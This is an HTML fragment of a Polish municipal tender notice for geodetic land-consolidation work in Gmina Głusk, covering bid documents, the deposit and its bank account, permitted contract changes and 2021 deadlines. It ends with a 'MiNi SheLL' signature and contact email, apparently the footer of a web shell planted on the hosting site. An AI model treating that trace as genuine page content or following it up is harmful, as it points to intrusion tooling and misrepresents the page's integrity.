w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione<br/>w okresie ostatnich 3 miesięcy;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami;<br/>4) Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z<br/>innymi wykonawcami wykaz, o którym mowa powyżej dotyczy usług, w których wykonaniu wykonawca<br/>ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których<br/>wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>5) Dokumenty, o których mowa powyżej w Rozdz. VII cz. A ust. 2, składają łącznie wszyscy<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub też z osobna każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Na ofertę składają się:<br/>1) uzupełniony formularz ofertowy, zgodnie z załącznikiem nr 1 do SWZ,<br/>2) aktualne oświadczenie, o którym mowa w art. 125 ust. 1 PZP, o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu, wg wzoru stanowiącego Załącznik nr 2 do<br/>SWZ składane przez każdego z Wykonawców,<br/>3) aktualne oświadczenie Podmiotu udostępniającego zasoby, o którym mowa w art. 125 ust. 5<br/>PZP, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, wg wzoru<br/>stanowiącego Załącznik nr 3 do SWZ – jeśli dotyczy,<br/>4) Zobowiązanie Podmiotu udostępniającego zasoby wg wzoru stanowiącego Załącznik nr 4 do<br/>SWZ - jeśli dotyczy,<br/>5) Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie wg wzoru<br/>stanowiącego Załącznik nr 5 do SWZ - jeśli dotyczy<br/>2. Wraz z ofertą, Wykonawca ma obowiązek złożyć:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia,<br/>że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów;<br/>2) jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w punkcie poprzedzającym: pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania wykonawcy;<br/>3) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia o ile dotyczy;<br/>3. Jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie<br/>podmiotu udostępniającego zasoby, o którym mowa w zdaniu poprzedzającym, musi<br/>potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby<br/>gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności<br/>dotyczą.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć aktualne oświadczenie, o którym mowa w<br/>art. 125 ust. 1 PZP, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu, wg wzoru stanowiącego Załącznik nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 2000,00 zł (słownie: dwa tysiące<br/>złotych i 00/00).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których stanowi<br/>w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy PZP.<br/>3. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2020,<br/>poz. 299 ze zm.)<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:<br/>1) być wystawione na Zamawiającego,<br/>2) zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do<br/>bezwarunkowej i nieodwołalnej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego,<br/>zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 98 ust. 6 ustawy<br/>PZP.<br/>6. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:<br/>nr: 24 8689 0007 0000 3580 2000 0060 Spółdzielczy Bank Powiatowy w Piaskach z dopiskiem:<br/>Wadium do przetargu na Wykonanie prac geodezyjnych w procedurze scalenia i podziału<br/>nieruchomości położonych na terenie wsi Wólka Abramowicka w Gminie Głusk ZP.271.30.2021.<br/>7. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych<br/>na rachunku bankowym Zamawiającego, przed upływem terminu składania ofert (tj. przed<br/>upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>8. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>10. Złożenie wniosku o zwrot wadium, o którym mowa w ust. 9, powoduje rozwiązanie stosunku<br/>prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej.<br/>11. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z<br/>umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty<br/>prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek<br/>bankowy wskazany przez wykonawcę.<br/>12. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>13. Termin ważności wadium musi być zgodny z terminem związania ofertą.<br/>14. Oferta Wykonawcy, który nie wniesie wadium lub wniesie je w sposób nieprawidłowy,<br/>zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o<br/>którym mowa w art. 125 ust. 1 PZP, składa każdy z tych wykonawców, wg wzoru stanowiącego<br/>Załącznik nr 2 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>2) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz oświadczeniem, o którym mowa w art. 125 ust. 1<br/>PZP, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby, wg wzoru stanowiącego Załącznik nr<br/>3 do SWZ. Wykonawca w powyższej sytuacji dołącza także Zobowiązanie podmiotu<br/>udostępniającego zasoby składane na podstawie art.118 ust. 3 i 4 ustawy Pzp zgodnie z wzorem<br/>stanowiącym - Załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, mających na celu prawidłową realizację<br/>przedmiotu zamówienia, w następujących przypadkach:<br/>a) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację umowy – w zakresie objętym zmianą;<br/>b) dopuszcza się zmianę osób biorących udział w wykonaniu zamówienia wskazanej w<br/>załączniku do SIWZ. Z zastrzeżeniem, iż osoba ta musi zostać zastąpiona inną osobą o<br/>uprawnieniach nie gorszych niż posiadane przez osobę zastępowaną,<br/>c) gdy zmiany będą korzystne dla Zamawiającego i będą leżały w interesie publicznym;<br/>d) dopuszcza się poprawę omyłek pisarskich i rachunkowych w treści umowy;<br/>e) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń<br/>Instytucji, która przyznała środki na sfinansowanie zadania;<br/>f) dopuszcza się zmianę podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot<br/>umowy na innego po uprzedniej akceptacji Zamawiającego,<br/>g) dopuszcza się rezygnację z podwykonawcy, przy pomocy którego Zamawiający realizuje<br/>przedmiot zamówienia.<br/>h) wstrzymania prac przez Zamawiającego,<br/>i) innych przyczyn niezależnych od Wykonawcy (przy zachowaniu przez niego należytej<br/>staranności), skutkujących niemożliwością dotrzymania terminu zakończenia zadania,<br/>j) konieczność zmiany innych warunków umowy, jeżeli w chwili jej zawarcia nieznane były fakty<br/>mające na nie wpływ, przy jednoczesnym założeniu, ze zakres zmian spowoduje następstwa<br/>korzystne dla Zamawiającego,<br/>k) zmiany formy zabezpieczenia należytego wykonania umowy,<br/>l) dopuszcza się zmianę terminu wykonania umowy w przypadkach:<br/>- działania siły wyższej– termin wykonania przedmiotu umowy może wówczas zostać<br/>przedłużony o czas trwania okoliczności: w szczególności z powodu: ogłoszenia stanu<br/>zagrożenia epidemiologicznego , stanu epidemii , klęki żywiołowej, stanu nadzwyczajnego, w sytuacji gdy realizacja umowy w dotychczasowy sposób nie jest możliwa na skutek siły<br/>wyższej – o czas trwania okoliczności wywołanych działaniem siły wyższej,<br/>- wystąpienia warunków atmosferycznych odbiegających od typowych, uniemożliwiających<br/>prowadzenie prac terenowych – o czas trwania tych warunków,<br/>- udokumentowania niezależnej od Zamawiającego i Wykonawcy przewlekłości postępowania<br/>o uzyskanie od instytucji lub urzędów dokumentów (np. pozwoleń, decyzji, uzgodnień)<br/>niezbędnych do realizacji umowy– termin wykonania przedmiotu umowy może wówczas zostać<br/>przedłużony o czas trwania okoliczności;<br/>- w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego, których<br/>nie dało się przewidzieć na etapie przygotowywania postępowania o udzielenie zamówienia, a<br/>uniemożliwiających prawidłową realizację zamówienia przez Wykonawcę,<br/>- w przypadku protestów mieszkańców lub braku zgód mieszkańców niezbędnych do realizacji<br/>niniejszego zamówienia mających wpływ na wykonanie umowy, o czas trwania tych protestów<br/>lub okoliczności związanych z brakiem zgód,<br/>- w przypadku konieczności przeprowadzenia procedury rozgraniczenia nieruchomości – o czas<br/>trwania tej procedury,<br/>m) dopuszcza się rezygnację z wykonania części zamówienia, jeżeli nie jest to niezbędne do<br/>prawidłowego wykonania całości zamówienia – w takim przypadku stosownemu zmniejszeniu<br/>ulega wynagrodzenie Wykonawcy,<br/>n) dopuszcza się zmianę sposoby wykonania zamówienia, jeżeli jest to niezbędne do jego<br/>prawidłowego wykonania.<br/>2. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany niniejszej umowy następujące<br/>zmiany:<br/>a) danych teleadresowych;<br/>b) danych rejestrowych;<br/>c) będące następstwem sukcesji uniwersalnej po jednej ze stron niniejszej umowy.<br/>4. Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do<br/>udokumentowania zaistnienia okoliczności, o których mowa w ust. 2. Wniosek o zmianę<br/>postanowień umowy musi być wyrażony na piśmie.<br/>5. Zmiany umowy wymaga formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com